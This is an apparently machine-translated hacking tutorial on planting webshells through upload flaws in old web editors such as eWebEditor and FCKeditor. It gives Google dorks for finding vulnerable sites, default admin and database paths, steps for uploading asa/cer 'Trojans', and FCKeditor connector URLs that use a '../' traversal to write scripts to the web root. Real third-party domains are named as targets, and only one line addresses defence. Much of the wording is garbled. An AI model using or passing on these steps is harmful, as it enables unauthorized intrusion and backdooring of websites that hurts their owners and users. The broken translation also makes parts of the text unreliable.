Several search editor Vulnerabilities

Site: editor inurl: asp? Id inurl: ewebeditornet

For example, common editor vulnerabilities include:

Ewebeditor
Ewebeditornet
Fckeditor
Editor
Southidceditor
SouthidcEditor
Bigaccessories ditor

I. ewebeditor

1: The background downloaded by default:

Http://www.test.com/ewebeditor/admin_login.asp

If the background can enter:

Click style management:

Copy a copy of the standard file (you cannot modify it directly)

Add the image type (asa aaspsp) to the copy and Click Preview.

Click design in the editor and then directly upload the asa Trojan.

After uploading, you can see the location of the Trojan in the code!

(Principle: because the application configures an asa extension in the properties of the iis website, asp. dll is used for parsing, and asp also has cer cdx)

If the cer cdx asa is deleted, the ing cannot be found.

You can add aaspsp to the style image type after copying, and then upload asp files directly after uploading.

2: Download the default database

Www.test.com/ewebeditor/db/ewebeditor.mdb

Then analyze the database

Webeditor_system (1), you can see that the user name and password cannot be cracked.

In the webeditor_style (14 style table

The extension (s-fileext s_ingeext) of the files that can be uploaded)

I saw a small hacker who once performed asa aaspsp too much.

You can use it! (This method can also be used if the backend cannot be found)

Statements that can be constructed:

For example, ID = 46 s-name = standard1

Construction Code: ewebeditor. asp? Id = content & style = standard

After the ID and style name are changed

Ewebeditor. asp? Id = 46 & style = standard1

Then, go to the editor and upload the asa or asp file to get the webshell.

Ii. Exploitation of ewebeditornet Vulnerabilities

Default upload address:

Aspx "> www.test.com/ewebeditornet/upload.aspx

You can directly upload a cer Trojan.

Upload fails.

You can construct the following code in the address bar: javascript: lbtnUpload. click ();

Then view the source code:

Find uploadsave find address

Uploaded to the previusfile folder by default.

(Vulnerability repair: You can directly select none of the execution permissions of the upload folder in iss .)

Iii. fckeditor vulnerability Exploitation

Http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? Command = FileUpload & Type = Image & CurrentFolder =/
Change the file name field to NEWfile and select the file name to be defined.
After the upload, find the file in/userfiles/image /.

4. southidceditor

Http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

Http://www.xhkjit.com/admin/southidceditor/popup.asp

Http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp

5. bigaccessories ditor

This page is not mentioned.

Similar principles!

The defense method is very simple,

FCKeditor upload vulnerability,

Html? Type = all & Connector = connectors/asp/connector. asp "> http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = all & Connector = connectors/asp/connector. asp

Open this address to upload any types of files. The location where the horse uploads files is:
Http://www.xxx.com/UserFiles/all/1.asa
The variable "Type = all" is defined by yourself. The directory "all" is created here, and the new directory does not have any restrictions on the file format to be uploaded.

For example, input:
Http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = monyer & Connector = connectors/asp/connector. asp

The passed file is under the http://www.xxx.com/UserFiles/monyer/.

And if you enter: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = ../& Connector = connectors/asp/connector. asp
You can upload the script to the root directory of the website.

The uploaded file is under the root directory of the website.

Http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html? ForumID = 46 & threadID = 457 & messageID = 532 & ListType = FromForum & FromCurrentPage = 1 & time = 1219282232781